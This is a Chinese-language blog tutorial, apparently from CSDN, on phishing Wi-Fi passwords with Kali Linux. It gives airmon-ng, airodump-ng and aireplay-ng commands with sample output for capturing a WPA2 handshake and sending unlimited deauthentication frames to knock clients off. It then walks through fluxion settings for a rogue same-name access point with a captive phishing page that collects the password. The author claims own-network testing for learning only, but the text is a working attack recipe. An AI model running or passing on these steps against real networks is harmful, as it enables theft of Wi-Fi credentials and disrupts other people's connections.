kali利用fluxion无线网络钓鱼

看了网上所有关于fluxion的钓鱼使用教程都感觉不太全,本文本是整理为了自己复习学习,初学有问题还请大佬指示。

测试硬件:
笔记本电脑

无限外置网卡一张

(两张网卡是必须的)

软件:
fluxion

airmon

查看网卡
airmon-ng


选择网卡
我用的是wlan0(wlan0为电脑自带网卡)

启动网卡监听
airmon-ng start wlan0


查看网卡监听信息
airodump-ng wlan0mon


选择网络信息
(图片不是本次抓包的截图)

BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                     
                                                                                                                                     
 E0:40:07:09:50:A8   -1        0        0    0   1   -1                    <length:  0>                                              
 50:D2:F5:FE:FA:B1  -125       11        0    0   5  130   WPA2 CCMP   PSK  Xiaomi_FAB0                                              
 F6:D5:55:4E:09:6B  -58        9       12    0   3  360   WPA2 CCMP   PSK  OnePlus 7 pro                    
 

获取握手包
airodump-ng -c (信道CH) --bssid (bssid) -w /root(握手包存放目录) wlan0mon
参数:

-c 指定频道号

--bssid 指定路由器bssid

-w 指定抓取的握手包存储路径
 
 最后是指定网卡接口

CH  3 ][ Elapsed: 2 mins ][ 2020-09-08 00:54 ]                                              
                                                                                                                                     
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                 
                                                                                                                                     
 F6:D5:55:4E:09:6B   -3 100      841     2360    5   3  360   WPA2 CCMP   PSK  OPPO K5                                               
                                                                                                                                     
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                   
                                                                                                                                     
 F6:D5:55:4E:09:6B  26:84:7E:83:93:77  -29    0e- 1e     0    16562  EAPOL  OPPO K5                                                   F6:D5:55:4E:09:6B  4C:32:75:94:C5:15  -53    0e-24e  1616      572                                       
                           

     

开始攻击来获取握手报
新打开一个Shell ,之前的不要关。

aireplay-ng -0 0(攻击次数  0为无限次) -a BSSID -c (使用设备MAC地址 STATION ) wlan0mon

参数解释:

-0 攻击次数(-0 2 即攻击2次,-0 0为无限次数)

-a 指定无线路由器BSSID

-c 指定强制断开的设备

 最后是指定网卡接口

root@yuan:~# aireplay-ng -0 0 -a 50:D2:F5:FE:FA:B1 -c 38:6E:A2:5C:04:EC wlan0mon
00:15:28  Waiting for beacon frame (BSSID: 50:D2:F5:FE:FA:B1) on channel 5
00:15:29  Sending 64 directed DeAuth (code 7). STMAC: [38:6E:A2:5C:04:EC] [10|65 ACKs]
00:15:29  Sending 64 directed DeAuth (code 7). STMAC: [38:6E:A2:5C:04:EC] [10|63 ACKs]
00:15:30  Sending 64 directed DeAuth (code 7). STMAC: [38:6E:A2:5C:04:EC] [ 5|61 ACKs]


等待[ WPA handshake: F6:D5:55:4E:09:6B      出现证明握手包获取完成

在保存目录里.cap结尾的为握手包

找到fluxion目录
./fluxion.sh
运行fluxion


选择中文
(有人说中文有bug,如果英语好可以选择英语) 

选择建立 AP (建立一个同名网络)
 

 选择你想要搜索网络的网卡
 

 选择信道(我一般都是所有信道)
 

 扫描到你之前抓包的网络后按Ctrl+C结束扫描,填网络对应的序号回车


 选择干扰你要钓鱼网站的网卡
 

 接着无脑选择
 选择3 流氓AP - hostapd
 到这里最开始抓到握手包的用处来了

把你刚才抓到的握手包后缀为.cap的文件目录填上(直接拖拽最快)

回车

 选择cowpatty验证
 

 选择创建SSL证书


 选择断开原网络


 选择自己制作的钓鱼页面


 出现这个页面证明钓鱼WIFI开始工作了,扫描WIFI原网络已经无法连接了只能自动连接我们自己伪造的同名AP

 手机连接成功后自动弹窗输入密码后进行验证,右上角的框会有提示,生成一个文件里边有密码和网络信息

 最后成果
 

本次测试钓鱼网络均为自己的网络,本文章仅供学习使用。
————————————————
版权声明:本文为CSDN博主「EVEB」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/u012781697/article/details/108451822

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值